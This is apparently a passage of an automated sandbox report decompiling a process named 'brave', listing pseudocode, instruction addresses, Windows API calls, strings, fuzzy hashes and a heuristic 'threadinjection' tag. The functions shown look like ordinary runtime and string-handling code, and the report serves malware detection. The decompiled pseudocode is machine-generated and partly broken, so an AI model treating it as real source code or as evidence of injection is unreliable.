				if ( *((long long*)(_t383 + 0x58)) == 0) goto 0xa6012569;
				if (_t384 != 0) goto 0xa60126d8;
				E00007FF67FF6A6017060();
				_t415 =  *((intOrPtr*)(_t384 + 0x58));
				 *_t415 = _t494;
				if ( *_t497 != 0) goto 0xa6012577;
				E00007FF67FF6A6017060();
				_t386 =  *_t497;
				goto 0xa601257f;
				goto 0xa60128a6;
				if (_t415 -  *((intOrPtr*)( *((intOrPtr*)(_t386 + 0x70)))) >= 0) goto 0xa6012876;
				if ( *((long long*)(_t386 + 0x70)) != 0) goto 0xa6012ba2;
				 *((long long*)(_t386 + 0x70)) = 0xa62c13a0;
				if ( *((long long*)(_t386 + 0x68)) == 0) goto 0xa6012c28;
				_t436 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 0x68)))) + (_t415 << 4) - 0x10;
				memcpy(??, ??, ??);
				_t389 =  *_t497;
				if (_t389 != 0) goto 0xa6012876;
				E00007FF67FF6A6017060();
				if ( *((long long*)(_t389 + 0x70)) != 0) goto 0xa6012a10;
				goto 0xa6012881;
				goto 0xa6012b3f;
				E00007FF67FF6A6017060();
				_t391 =  *_t497;
				 *((long long*)( *((intOrPtr*)( *_t497 + 0x70)))) =  *((long long*)( *((intOrPtr*)( *_t497 + 0x70)))) - 1;
				if (_t391 != 0) goto 0xa6012890;
				E00007FF67FF6A6017060();
				_t392 =  *_t497;
				if ( *((long long*)(_t391 + 0x70)) == 0) goto 0xa601289b;
				if (_t392 != 0) goto 0xa6012b10;
				E00007FF67FF6A6017060();
				if ( *((long long*)( *((intOrPtr*)(_t392 + 0x70)))) != 0) goto 0xa6012422;
				_t394 =  *_t497;
				if (_t394 != 0) goto 0xa60128b0;
				E00007FF67FF6A6017060();
				_t395 =  *_t497;
				if ( *((long long*)(_t394 + 0x68)) == 0) goto 0xa6012c5b;
				if (_t395 != 0) goto 0xa60128bb;
				E00007FF67FF6A6017060();
				goto 0xa60128bb;
				 *((long long*)(_t395 + 0x68)) = 0xa62c13a8;
				goto 0xa6012b58;
				 *((long long*)(_t395 + 0x70)) = 0xa62c13a0;
				goto 0xa60128f9;
				 *0x7FF6A62C1418 = 0xa62c1398;
				goto 0xa60128e3;
				 *0x7FF6A62C1408 = 0xa62c13a8;
				goto 0xa60128bf;
				if ( *((long long*)(0x7ff6a62c1410)) != 0) goto 0xa6012b65;
				 *((long long*)(0x7ff6a62c1410)) = 0xa62c13a8;
				goto 0xa6012b69;
				E00007FF67FF6A6017060();
				goto 0xa6012594;
				E00007FF67FF6A6017060();
				if ( *((long long*)( *_t497 + 0x68)) != 0) goto 0xa6012908;
				goto 0xa6012844;
				E00007FF67FF6A6017060();
				_t401 =  *_t497;
				if ( *((long long*)( *_t497 + 0x78)) == 0) goto 0xa6012c4b;
				if (_t401 != 0) goto 0xa60128df;
				E00007FF67FF6A6017060();
				_t402 =  *_t497;
				 *((long long*)( *((intOrPtr*)(_t401 + 0x78)))) = 0;
				if (_t402 != 0) goto 0xa60128ea;
				E00007FF67FF6A6017060();
				if ( *((long long*)(_t402 + 0x70)) == 0) goto 0xa6012c38;
				if ( *_t497 != 0) goto 0xa60128f5;
				_t206 = E00007FF67FF6A6017060();
				goto 0xa60128f5;
				asm("o16 nop [eax+eax]");
				if (_t436 == 0) goto 0xa6012d2f;
				if ( *((long long*)(_t436 + 0x1d0)) == 0) goto 0xa6012d30;
				return _t206;
			}

0x7ff6a6012220
0x7ff6a601223b
0x7ff6a601224a
0x7ff6a6012259
0x7ff6a6012268
0x7ff6a601226f
0x7ff6a6012276
0x7ff6a601227b
0x7ff6a6012284
0x7ff6a601228d
0x7ff6a6012296
0x7ff6a601229f
0x7ff6a60122a8
0x7ff6a60122b1
0x7ff6a60122bd
0x7ff6a60122c5
0x7ff6a60122cd
0x7ff6a60122d8
0x7ff6a60122e0
0x7ff6a60122eb
0x7ff6a60122f7
0x7ff6a6012308
0x7ff6a6012311
0x7ff6a6012316
0x7ff6a601231d
0x7ff6a6012322
0x7ff6a6012327
0x7ff6a601232d
0x7ff6a6012341
0x7ff6a6012343
0x7ff6a601235a
0x7ff6a601235d
0x7ff6a601236c
0x7ff6a6012371
0x7ff6a6012375
0x7ff6a6012377
0x7ff6a601237c
0x7ff6a6012385
0x7ff6a6012391
0x7ff6a6012392
0x7ff6a6012393
0x7ff6a6012395
0x7ff6a6012397
0x7ff6a60123a3
0x7ff6a60123aa
0x7ff6a60123b0
0x7ff6a60123c0
0x7ff6a60123c5
0x7ff6a60123c7
0x7ff6a60123e0
0x7ff6a60123e7
0x7ff6a60123f1
0x7ff6a60123fc
0x7ff6a6012409
0x7ff6a601240d
0x7ff6a601241c
0x7ff6a6012429
0x7ff6a601242b
0x7ff6a6012437
0x7ff6a6012439
0x7ff6a6012445
0x7ff6a6012447
0x7ff6a6012455
0x7ff6a601245c
0x7ff6a6012477
0x7ff6a601247a
0x7ff6a6012481
0x7ff6a601248c
0x7ff6a6012499
0x7ff6a60124a1
0x7ff6a60124ac
0x7ff6a60124b9
0x7ff6a60124c0
0x7ff6a60124cc
0x7ff6a60124d6
0x7ff6a60124dc
0x7ff6a60124e7
0x7ff6a60124ec
0x7ff6a60124f5
0x7ff6a6012504
0x7ff6a6012506
0x7ff6a6012507
0x7ff6a601250b
0x7ff6a601250f
0x7ff6a6012518
0x7ff6a6012522
0x7ff6a6012526
0x7ff6a601252f
0x7ff6a6012531
0x7ff6a6012536
0x7ff6a6012544
0x7ff6a6012558
0x7ff6a6012563
0x7ff6a6012570
0x7ff6a6012574
0x7ff6a6012581
0x7ff6a601258a
0x7ff6a6012597
0x7ff6a601259d
0x7ff6a60125a3
0x7ff6a60125ad
0x7ff6a60125b4
0x7ff6a60125c4
0x7ff6a60125d0
0x7ff6a60125d4
0x7ff6a60125e7
0x7ff6a60125eb
0x7ff6a60125f0
0x7ff6a60125f7
0x7ff6a6012602
0x7ff6a601260f
0x7ff6a601261a
0x7ff6a6012629
0x7ff6a6012636
0x7ff6a6012644
0x7ff6a6012646
0x7ff6a6012653
0x7ff6a6012660
0x7ff6a6012666
0x7ff6a6012674
0x7ff6a601267f
0x7ff6a6012685
0x7ff6a601268f
0x7ff6a6012698
0x7ff6a60126a1
0x7ff6a60126ac
0x7ff6a60126b2
0x7ff6a60126ba
0x7ff6a60126c0
0x7ff6a60126c2
0x7ff6a60126c8
0x7ff6a60126cc
0x7ff6a60126dc
0x7ff6a60126e8
0x7ff6a60126ef
0x7ff6a60126f8
0x7ff6a60126ff
0x7ff6a6012708
0x7ff6a6012712
0x7ff6a6012716
0x7ff6a601271b
0x7ff6a6012721
0x7ff6a6012726
0x7ff6a6012730
0x7ff6a601273a
0x7ff6a601273e
0x7ff6a6012743
0x7ff6a6012749
0x7ff6a601274e
0x7ff6a6012758
0x7ff6a6012760
0x7ff6a6012769
0x7ff6a6012772
0x7ff6a6012778
0x7ff6a6012785
0x7ff6a601278b
0x7ff6a6012792
0x7ff6a6012798
0x7ff6a60127a0
0x7ff6a60127a9
0x7ff6a60127b2
0x7ff6a60127b8
0x7ff6a60127c0
0x7ff6a60127cb
0x7ff6a60127d5
0x7ff6a60127db
0x7ff6a60127ec
0x7ff6a60127f5
0x7ff6a60127fb
0x7ff6a6012804
0x7ff6a6012808
0x7ff6a6012814
0x7ff6a6012818
0x7ff6a6012827
0x7ff6a601282b
0x7ff6a6012833
0x7ff6a601283e
0x7ff6a601284b
0x7ff6a601284f
0x7ff6a6012858
0x7ff6a6012865
0x7ff6a601286c
0x7ff6a6012870
0x7ff6a601287b
0x7ff6a6012888
0x7ff6a601288c
0x7ff6a6012895
0x7ff6a60128a2
0x7ff6a60128aa
0x7ff6a60128b5
0x7ff6a60128c2
0x7ff6a60128c7
0x7ff6a60128ce
0x7ff6a60128d9
0x7ff6a60128df
0x7ff6a60128e3
0x7ff6a60128ef
0x7ff6a60128fc
0x7ff6a60128ff
0x7ff6a601290f
0x7ff6a6012915
0x7ff6a601291a
0x7ff6a6012925
0x7ff6a601292b
0x7ff6a6012935
0x7ff6a6012939
0x7ff6a6012942
0x7ff6a6012948
0x7ff6a6012954
0x7ff6a6012958
0x7ff6a6012968
0x7ff6a601296e
0x7ff6a601297c
0x7ff6a6012985
0x7ff6a601298b
0x7ff6a6012997
0x7ff6a60129a5
0x7ff6a60129ab
0x7ff6a60129b9
0x7ff6a60129c2
0x7ff6a60129c8
0x7ff6a60129d4
0x7ff6a60129de
0x7ff6a60129e4
0x7ff6a60129f2
0x7ff6a60129fb
0x7ff6a6012a01
0x7ff6a6012a06
0x7ff6a6012a10
0x7ff6a6012a17
0x7ff6a6012a21
0x7ff6a6012a26
0x7ff6a6012a30
0x7ff6a6012a35
0x7ff6a6012a3a
0x7ff6a6012a40
0x7ff6a6012a4a
0x7ff6a6012a4e
0x7ff6a6012a57
0x7ff6a6012a5d
0x7ff6a6012a6a
0x7ff6a6012a70
0x7ff6a6012a77
0x7ff6a6012a7d
0x7ff6a6012a8b
0x7ff6a6012a94
0x7ff6a6012a9a
0x7ff6a6012aa7
0x7ff6a6012aac
0x7ff6a6012ab3
0x7ff6a6012ab9
0x7ff6a6012ac1
0x7ff6a6012aca
0x7ff6a6012ad3
0x7ff6a6012ad9
0x7ff6a6012ade
0x7ff6a6012ae6
0x7ff6a6012aec
0x7ff6a6012af2
0x7ff6a6012afc
0x7ff6a6012b03
0x7ff6a6012b14
0x7ff6a6012b27
0x7ff6a6012b32
0x7ff6a6012b3b
0x7ff6a6012b4e
0x7ff6a6012b72
0x7ff6a6012b77
0x7ff6a6012b7c
0x7ff6a6012b83
0x7ff6a6012b89
0x7ff6a6012b93
0x7ff6a6012b9d
0x7ff6a6012ba6
0x7ff6a6012ba8
0x7ff6a6012bb1
0x7ff6a6012bb5
0x7ff6a6012bbc
0x7ff6a6012bc2
0x7ff6a6012bca
0x7ff6a6012bd3
0x7ff6a6012bdc
0x7ff6a6012be2
0x7ff6a6012bef
0x7ff6a6012bf5
0x7ff6a6012bfc
0x7ff6a6012c02
0x7ff6a6012c0a
0x7ff6a6012c13
0x7ff6a6012c18
0x7ff6a6012c1e
0x7ff6a6012c23
0x7ff6a6012c2f
0x7ff6a6012c33
0x7ff6a6012c3f
0x7ff6a6012c46
0x7ff6a6012c52
0x7ff6a6012c56
0x7ff6a6012c62
0x7ff6a6012c69
0x7ff6a6012c73
0x7ff6a6012c80
0x7ff6a6012c87
0x7ff6a6012c8c
0x7ff6a6012c99
0x7ff6a6012c9e
0x7ff6a6012ca8
0x7ff6a6012cb2
0x7ff6a6012cb7
0x7ff6a6012cbf
0x7ff6a6012cc8
0x7ff6a6012ccd
0x7ff6a6012cd3
0x7ff6a6012cdc
0x7ff6a6012ce0
0x7ff6a6012cea
0x7ff6a6012cf0
0x7ff6a6012d01
0x7ff6a6012d0a
0x7ff6a6012d10
0x7ff6a6012d15
0x7ff6a6012d1a
0x7ff6a6012d23
0x7ff6a6012d2d
0x7ff6a6012d2f

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF6A60122CD
_ultoa.MSVCRT ref: 00007FF6A60122E0
OutputDebugStringA.KERNEL32 ref: 00007FF6A6012327
abort.MSVCRT ref: 00007FF6A601232D

Strings

eaning u, xrefs: 00007FF6A6012231
Error cl, xrefs: 00007FF6A6012227
eys for , xrefs: 00007FF6A601224F
thread , xrefs: 00007FF6A601225E
p spin_k, xrefs: 00007FF6A6012240

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CurrentDebugOutputStringThread_ultoaabort
String ID: Error cl$eaning u$eys for $p spin_k$thread
API String ID: 4191895893-3545615192
Opcode ID: 5e02075398575467d757778500d00e02b97ceec7ff2355a5d38304a33f0ea4e3
Instruction ID: 3e7dfeb76a688d4605a7d659c83c5f0c49a1a2be29788da6dd66d72601c5451d
Opcode Fuzzy Hash: 5e02075398575467d757778500d00e02b97ceec7ff2355a5d38304a33f0ea4e3
Instruction Fuzzy Hash: 9921747260DB8085E7648B14F15431BB6E1F785B88F504134E2CD8BB98DF7ED499CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600F750 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF6A600F761
WaitForSingleObject.KERNEL32 ref: 00007FF6A600F772
FindAtomA.KERNEL32 ref: 00007FF6A600F7DF
ReleaseMutex.KERNEL32 ref: 00007FF6A600F7ED
CloseHandle.KERNEL32 ref: 00007FF6A600F7F6
CloseHandle.KERNEL32 ref: 00007FF6A600F817

Strings

failed to to lock cleanup mutex, xrefs: 00007FF6A600F808

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
String ID: failed to to lock cleanup mutex
API String ID: 3776795807-674698732
Opcode ID: 71f342f9f933a52b181f13a2de0319036eade7889627a245c740d797601e7c04
Instruction ID: 062d7e263af273a944bb39db71c93ae6524bd264f94271f5c3aee5d82c54ad97
Opcode Fuzzy Hash: 71f342f9f933a52b181f13a2de0319036eade7889627a245c740d797601e7c04
Instruction Fuzzy Hash: BE213B65A0BA0381EF54DF62EA5917863A1BF45F85B859835CC0EC73A4EE3EF891D301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6021DD0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6A6021DE1
GetProcAddress.KERNEL32 ref: 00007FF6A6021DF8
LoadLibraryW.KERNEL32 ref: 00007FF6A6021E1F
GetProcAddress.KERNEL32 ref: 00007FF6A6021E2F

Strings

SystemFunction036, xrefs: 00007FF6A6021E25
rand_s, xrefs: 00007FF6A6021DEE
advapi32.dll, xrefs: 00007FF6A6021E18
msvcrt.dll, xrefs: 00007FF6A6021DDA

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 4f62b90e336705d4da321a7fa2fb84c276bc2db0b258b9504fce3f42ee99db90
Instruction ID: e9b52d2bc8c96b17c66f6b02392c9dc0e0ee5680fd7867a2418f4b7cf626ca09
Opcode Fuzzy Hash: 4f62b90e336705d4da321a7fa2fb84c276bc2db0b258b9504fce3f42ee99db90
Instruction Fuzzy Hash: F2F0B220E0BA03D5EE09AB51FE5507523A4FF19F90B881176C90E8236DEE3EE5A5C344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A602DEF0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 196COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF6A602DF96
memcpy.MSVCRT ref: 00007FF6A602DFC1
memcpy.MSVCRT ref: 00007FF6A602E030
memcpy.MSVCRT ref: 00007FF6A602E06E
memcpy.MSVCRT ref: 00007FF6A602E0BF

Strings

basic_string::_M_replace, xrefs: 00007FF6A602E1DE

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_replace
API String ID: 3510742995-2323331477
Opcode ID: 83352c911b5e7a670d2c16afee725c69e32d097fda13c06022162402ec47247e
Instruction ID: 8e5957bf323e92701e12c69907cd537474a584c547eb9d0ad64b72fa7d6854f0
Opcode Fuzzy Hash: 83352c911b5e7a670d2c16afee725c69e32d097fda13c06022162402ec47247e
Instruction Fuzzy Hash: 7471D432A9AB9691E960DF21C2041BE6758AF00F94F9545B2DB1D977D0DE3EE9E1C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A602AE20 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF6A602AEC5
memcpy.MSVCRT ref: 00007FF6A602AEF0
memcpy.MSVCRT ref: 00007FF6A602AF59
memcpy.MSVCRT ref: 00007FF6A602AF8D
memcpy.MSVCRT ref: 00007FF6A602AFD9

Strings

basic_string::_M_replace, xrefs: 00007FF6A602B0E1

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_replace
API String ID: 3510742995-2323331477
Opcode ID: 6e4ccbe5bf110cb7a92f3fabf76553f9e581279dc44f1e42f5d797bc024edc43
Instruction ID: 8d7e9df7cdc4086ad929d4c2d79aea41afb6bc5f9fbd2c65aac9dda4e06525c3
Opcode Fuzzy Hash: 6e4ccbe5bf110cb7a92f3fabf76553f9e581279dc44f1e42f5d797bc024edc43
Instruction Fuzzy Hash: 62611862E0F6D685E9229A3582446B96A54DF12FC4F4841B2CF6CD7BC2DE2FE5D2C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6015AE0 Relevance: 13.7, APIs: 9, Instructions: 182
threadinjectionsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00007FF67FF6A6015AE0(void* __ecx, void* __edi, void* __rax, void* __rcx) {
				char _v1272;
				signed int _t18;
				void* _t39;
				void* _t40;
				void* _t42;
				intOrPtr _t50;
				void* _t51;
				intOrPtr* _t52;

				_t39 = __rax;
				_t51 = __rcx;
				E00007FF67FF6A6013190(__edi, __rcx);
				_t42 = _t39;
				if (_t39 == 0) goto 0xa6015bce;
				_t40 =  *((intOrPtr*)(_t39 + 0x28)) - 1;
				if (_t40 - 0xfffffffd > 0) goto 0xa6015bce;
				if (GetHandleInformation(??, ??) == 0) goto 0xa6015bce;
				_t4 = _t42 + 0x38; // 0x38
				E00007FF67FF6A60104E0(_t4);
				E00007FF67FF6A6012D40(__ecx,  &_v1272);
				if (_t40 == 0) goto 0xa6015d20;
				_t18 =  *(_t42 + 0x40) & 0x000000ff;
				if (_t51 ==  *((intOrPtr*)(_t40 + 0x1d8))) goto 0xa6015ca0;
				if (( *(_t42 + 0x44) & 0x00000003) == 3) goto 0xa6015be8;
				if ((_t18 & 0x00000003) != 0) goto 0xa6015bc0;
				_t52 =  *0xa62b6920; // 0x7ff6a62c1400
				_t50 =  *_t52;
				 *(_t42 + 0x40) = _t18 & 0xfffffffc | 0x00000001;
				if (_t50 == 0) goto 0xa6015d50;
				if ( *((long long*)(_t50 + 0x18)) == 0) goto 0xa6015d30;
				asm("lock add dword [eax], 0x1");
				if ( *((intOrPtr*)(_t42 + 0x30)) == 0) goto 0xa6015ba8;
				SetEvent(??);
				E00007FF67FF6A6010800(_t4);
				return 0;
			}

0x7ff6a6015ae0
0x7ff6a6015aed
0x7ff6a6015af0
0x7ff6a6015af5
0x7ff6a6015afb
0x7ff6a6015b05
0x7ff6a6015b0d
0x7ff6a6015b23
0x7ff6a6015b29
0x7ff6a6015b30
0x7ff6a6015b35
0x7ff6a6015b3d
0x7ff6a6015b4a
0x7ff6a6015b51
0x7ff6a6015b60
0x7ff6a6015b68
0x7ff6a6015b6a
0x7ff6a6015b77
0x7ff6a6015b7a
0x7ff6a6015b80
0x7ff6a6015b8b
0x7ff6a6015b95
0x7ff6a6015ba0
0x7ff6a6015ba2
0x7ff6a6015bab
0x7ff6a6015bbf

APIs

GetHandleInformation.KERNEL32 ref: 00007FF6A6015B1B

Part of subcall function 00007FF6A6012D40: TlsGetValue.KERNEL32 ref: 00007FF6A6012DA0

SetEvent.KERNEL32 ref: 00007FF6A6015BA2
SuspendThread.KERNEL32 ref: 00007FF6A6015BFC
WaitForSingleObject.KERNEL32 ref: 00007FF6A6015C08
GetThreadContext.KERNEL32 ref: 00007FF6A6015C1C
SetThreadContext.KERNEL32 ref: 00007FF6A6015C38
SetEvent.KERNEL32 ref: 00007FF6A6015C7E
ResumeThread.KERNEL32 ref: 00007FF6A6015C90
SetEvent.KERNEL32 ref: 00007FF6A6015CE3

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: Thread$Event$Context$HandleInformationObjectResumeSingleSuspendValueWait
String ID:
API String ID: 2335333592-0
Opcode ID: c0454334065818ad910fe9271c82020997dc8f7e4f5c5ab4ac494b7568ff68ad
Instruction ID: 7f65cabbac01a7e0a8c5d8968294d383ac32c6c33ea6da842031859561be4327
Opcode Fuzzy Hash: c0454334065818ad910fe9271c82020997dc8f7e4f5c5ab4ac494b7568ff68ad
Instruction Fuzzy Hash: 088181A2A0BA0281EB669F21D6443792761FF40F9CF544531DA5DCB399DF2EE8E4C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6027980 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF67FF6A6027980(intOrPtr* __rcx, void* __rdx) {
				void* _t13;

				_t13 = __rdx;
				if (__rdx - 0xfffffff9 > 0) goto 0xa60279ef;
				E00007FF67FF6A6028580(__rcx, __rdx,  *((intOrPtr*)( *__rcx - 0x18)), __rdx);
				if (_t13 == 0) goto 0xa60279cc;
				if (_t13 == 1) goto 0xa60279e0;
				return memset(??, ??, ??);
			}

0x7ff6a6027995
0x7ff6a60279a5
0x7ff6a60279ac
0x7ff6a60279b4
0x7ff6a60279be
0x7ff6a60279d7

APIs

memset.MSVCRT ref: 00007FF6A60279C7
memcpy.MSVCRT ref: 00007FF6A6027BB9

Part of subcall function 00007FF6A6028580: memcpy.MSVCRT ref: 00007FF6A60285FB

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A6027CB9
basic_string::insert, xrefs: 00007FF6A6027CA3, 00007FF6A6027CB2
basic_string::_M_replace_aux, xrefs: 00007FF6A60279EF

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
